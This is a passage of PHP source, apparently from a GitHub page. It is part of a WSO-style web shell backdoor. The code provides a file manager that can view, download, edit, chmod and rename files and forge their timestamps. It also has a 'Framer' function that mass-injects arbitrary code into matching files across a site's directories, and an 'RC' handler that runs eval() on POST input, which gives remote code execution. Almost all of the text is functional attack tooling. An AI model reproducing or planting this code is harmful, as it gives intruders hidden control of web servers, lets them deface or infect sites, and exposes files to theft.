| <form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>"; | |
| $dirs = $files = array(); | |
| $n = count($dirContent); | |
| for($i=0;$i<$n;$i++) { | |
| $ow = @posix_getpwuid(@fileowner($dirContent[$i])); | |
| $gr = @posix_getgrgid(@filegroup($dirContent[$i])); | |
| $tmp = array('name' => $dirContent[$i], | |
| 'path' => $GLOBALS['cwd'].$dirContent[$i], | |
| 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), | |
| 'perms' => oswPermsColor($GLOBALS['cwd'] . $dirContent[$i]), | |
| 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), | |
| 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), | |
| 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) | |
| ); | |
| if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) | |
| $files[] = array_merge($tmp, array('type' => 'file')); | |
| elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) | |
| $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); | |
| elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])) | |
| $dirs[] = array_merge($tmp, array('type' => 'dir')); | |
| } | |
| $GLOBALS['sort'] = $sort; | |
| function oswCmp($a, $b) { | |
| if($GLOBALS['sort'][0] != 'size') | |
| return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); | |
| else | |
| return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); | |
| } | |
| usort($files, "oswCmp"); | |
| usort($dirs, "oswCmp"); | |
| $files = array_merge($dirs, $files); | |
| $l = 0; | |
| foreach($files as $f) { | |
| echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?oswViewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms'] | |
| .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>'; | |
| $l = $l?0:1; | |
| } | |
| echo "<tr><td colspan=7> | |
| <input type=hidden name=a value='FilesMan'> | |
| <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'> | |
| <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'> | |
| <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; | |
| if(class_exists('ZipArchive')) | |
| echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>"; | |
| echo "<option value='tar'>Compress (tar.gz)</option>"; | |
| if(!empty($_COOKIE['act']) && @count($_COOKIE['f'])) | |
| echo "<option value='paste'>Paste / Compress</option>"; | |
| echo "</select> "; | |
| if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar'))) | |
| echo "file name: <input type=text name=p2 value='osw_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'> "; | |
| echo "<input type='submit' value='>>'></td></tr></form></table></div>"; | |
| oswFooter(); | |
| } | |
| function actionFilesTools() { | |
| if( isset($_POST['p1']) ) | |
| $_POST['p1'] = urldecode($_POST['p1']); | |
| if(@$_POST['p2']=='download') { | |
| if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { | |
| ob_start("ob_gzhandler", 4096); | |
| header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); | |
| if (function_exists("mime_content_type")) { | |
| $type = @mime_content_type($_POST['p1']); | |
| header("Content-Type: " . $type); | |
| } else | |
| header("Content-Type: application/octet-stream"); | |
| $fp = @fopen($_POST['p1'], "r"); | |
| if($fp) { | |
| while(!@feof($fp)) | |
| echo @fread($fp, 1024); | |
| fclose($fp); | |
| } | |
| }exit; | |
| } | |
| if( @$_POST['p2'] == 'mkfile' ) { | |
| if(!file_exists($_POST['p1'])) { | |
| $fp = @fopen($_POST['p1'], 'w'); | |
| if($fp) { | |
| $_POST['p2'] = "edit"; | |
| fclose($fp); | |
| } | |
| } | |
| } | |
| oswHeader(); | |
| echo '<h1>File tools</h1><div class=content>'; | |
| if( !file_exists(@$_POST['p1']) ) { | |
| echo 'File not exists'; | |
| oswFooter(); | |
| return; | |
| } | |
| $uid = @posix_getpwuid(@fileowner($_POST['p1'])); | |
| if(!$uid) { | |
| $uid['name'] = @fileowner($_POST['p1']); | |
| $gid['name'] = @filegroup($_POST['p1']); | |
| } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); | |
| echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?oswViewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.oswPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>'; | |
| echo '<span>Change time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>'; | |
| if( empty($_POST['p2']) ) | |
| $_POST['p2'] = 'view'; | |
| if( is_file($_POST['p1']) ) | |
| $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); | |
| else | |
| $m = array('Chmod', 'Rename', 'Touch'); | |
| foreach($m as $v) | |
| echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> '; | |
| echo '<br><br>'; | |
| switch($_POST['p2']) { | |
| case 'view': | |
| echo '<pre class=ml1>'; | |
| $fp = @fopen($_POST['p1'], 'r'); | |
| if($fp) { | |
| while( !@feof($fp) ) | |
| echo htmlspecialchars(@fread($fp, 1024)); | |
| @fclose($fp); | |
| } | |
| echo '</pre>'; | |
| break; | |
| case 'highlight': | |
| if( @is_readable($_POST['p1']) ) { | |
| echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">'; | |
| $code = @highlight_file($_POST['p1'],true); | |
| echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>'; | |
| } | |
| break; | |
| case 'chmod': | |
| if( !empty($_POST['p3']) ) { | |
| $perms = 0; | |
| for($i=strlen($_POST['p3'])-1;$i>=0;--$i) | |
| $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); | |
| if(!@chmod($_POST['p1'], $perms)) | |
| echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>'; | |
| } | |
| clearstatcache(); | |
| echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>'; | |
| break; | |
| case 'edit': | |
| if( !is_writable($_POST['p1'])) { | |
| echo 'File isn\'t writeable'; | |
| break; | |
| } | |
| if( !empty($_POST['p3']) ) { | |
| $time = @filemtime($_POST['p1']); | |
| $_POST['p3'] = substr($_POST['p3'],1); | |
| $fp = @fopen($_POST['p1'],"w"); | |
| if($fp) { | |
| @fwrite($fp,$_POST['p3']); | |
| @fclose($fp); | |
| echo 'Saved!<br><script>p3_="";</script>'; | |
| @touch($_POST['p1'],$time,$time); | |
| } | |
| } | |
| echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>'; | |
| $fp = @fopen($_POST['p1'], 'r'); | |
| if($fp) { | |
| while( !@feof($fp) ) | |
| echo htmlspecialchars(@fread($fp, 1024)); | |
| @fclose($fp); | |
| } | |
| echo '</textarea><input type=submit value=">>"></form>'; | |
| break; | |
| case 'hexdump': | |
| $c = @file_get_contents($_POST['p1']); | |
| $n = 0; | |
| $h = array('00000000<br>','',''); | |
| $len = strlen($c); | |
| for ($i=0; $i<$len; ++$i) { | |
| $h[1] .= sprintf('%02X',ord($c[$i])).' '; | |
| switch ( ord($c[$i]) ) { | |
| case 0: $h[2] .= ' '; break; | |
| case 9: $h[2] .= ' '; break; | |
| case 10: $h[2] .= ' '; break; | |
| case 13: $h[2] .= ' '; break; | |
| default: $h[2] .= $c[$i]; break; | |
| } | |
| $n++; | |
| if ($n == 32) { | |
| $n = 0; | |
| if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';} | |
| $h[1] .= '<br>'; | |
| $h[2] .= "\n"; | |
| } | |
| } | |
| echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>'; | |
| break; | |
| case 'rename': | |
| if( !empty($_POST['p3']) ) { | |
| if(!@rename($_POST['p1'], $_POST['p3'])) | |
| echo 'Can\'t rename!<br>'; | |
| else | |
| die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>'); | |
| } | |
| echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>'; | |
| break; | |
| case 'touch': | |
| if( !empty($_POST['p3']) ) { | |
| $time = strtotime($_POST['p3']); | |
| if($time) { | |
| if(!touch($_POST['p1'],$time,$time)) | |
| echo 'Fail!'; | |
| else | |
| echo 'Touched!'; | |
| } else echo 'Bad time format!'; | |
| } | |
| clearstatcache(); | |
| echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>'; | |
| break; | |
| } | |
| echo '</div>'; | |
| oswFooter(); | |
| } | |
| function actionLogout() { | |
| setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600); | |
| die('bye-bye!'); | |
| } | |
| function filelist($level,$path) | |
| { | |
| $arr=explode ('/',$path); | |
| unset($arr[count($arr)-1]); | |
| $count_array = count($arr); | |
| if ($level>$count_array-1) | |
| { | |
| $level = $count_array-1; | |
| } | |
| for ($i=$count_array-$level;$i<$count_array;$i++) | |
| unset($arr[$i]); | |
| return implode('/',$arr); | |
| } | |
| function glob_recursive($dir,$rfile){ | |
| $a = array(); | |
| foreach(glob($dir.'/*') as $filename){ | |
| if(strtolower(substr($filename, strlen($filename)-strlen($rfile), strlen($rfile)))==strtolower($rfile)) $a[]=$filename; | |
| if(is_dir($filename)) { $a=array_merge($a,glob_recursive($filename,$rfile));} | |
| } | |
| return $a; | |
| } | |
| function replace_frame($dir,$place,$frame,$rfile) | |
| { | |
| $info['founded'] = 0; | |
| $info['nowritable'] = 0; | |
| $info['replaces'] = 0; | |
| $info['edited_files'] = 0; | |
| $files=glob_recursive($dir,$rfile); | |
| foreach ($files as $file) | |
| { | |
| $info['founded']++; | |
| if (is_writable($file)) | |
| { | |
| $str=file_get_contents($file); | |
| $sub_count= substr_count($str,$place); | |
| if ($sub_count>0 and !preg_match('#'.$frame.'#is',$str)) | |
| { | |
| $info['replaces'] += $sub_count; | |
| $info['edited_files']++; | |
| $str=str_replace($place,$frame,$str); | |
| file_put_contents($file,$str); | |
| } | |
| } | |
| else $info['nowritable']++; | |
| } | |
| return $info; | |
| } | |
| function actionFramer() { | |
| oswHeader(); | |
| echo '<h1>Replace frames in selected files</h1> | |
| <div class=content>'; | |
| $p=explode(',',$_POST['p3']); | |
| echo '<table><form name="fr" method="post" onsubmit="var a=[this.level.value, this.file.value]; g(null,null,this.frame.value,this.rep_place.value,a); return false;"> | |
| <tr><td>Frame code</td><td><input type="text" name="frame" value="'.htmlspecialchars($_POST['p1']).'"></td></tr> | |
| <tr><td>What replace</td><td><input type="text" name="rep_place" value="'.htmlspecialchars($_POST['p2']).'"></td></tr> | |
| <tr><td>Level</td><td><input type="text" name="level" value="'.htmlspecialchars($p[0]).'"></td></tr> | |
| <tr><td>Mask file</td><td><input type="text" name="file" value="'.htmlspecialchars($p[1]).'"></td></tr> | |
| <tr><td></td><td><input type=submit value=">>"></td></tr> | |
| </form></table>'; | |
| if(!empty($_POST['p1'])) | |
| { | |
| $dir = filelist($p[0],$_SERVER['SCRIPT_FILENAME']); | |
| echo $dir; | |
| $info=replace_frame($dir,$_POST['p2'],$_POST['p1'],$p[1]); | |
| echo '<table><tr><td>found files:</td><td>'.$info['founded'].'</td><tr> | |
| <tr><td>not available for writing:</td><td>'.$info['nowritable'].'</td><tr> | |
| <tr><td>edited files:</td><td>'.$info['edited_files'].'</td><tr> | |
| <tr><td>all changes:</td><td>'.$info['replaces'].'</td><tr>'; | |
| } | |
| echo '</div>'; | |
| oswFooter(); | |
| } | |
| function actionRC() { | |
| if(!@$_POST['p1']) { | |
| $a = array( | |
| "uname" => php_uname(), | |
| "php_version" => phpversion(), | |
| "osw_version" => osw_VERSION, | |
| "safemode" => @ini_get('safe_mode') | |
| ); | |
| echo serialize($a); | |
| } else { | |
| eval($_POST['p1']); | |
| } | |
| } | |
| if( empty($_POST['a']) ) | |
| if(isset($default_action) && function_exists('action' . $default_action)) | |
| $_POST['a'] = $default_action; | |
| else | |
| $_POST['a'] = 'SecInfo'; | |
| if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) | |
| call_user_func('action' . $_POST['a']); | |
| exit; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
what does this file actually do?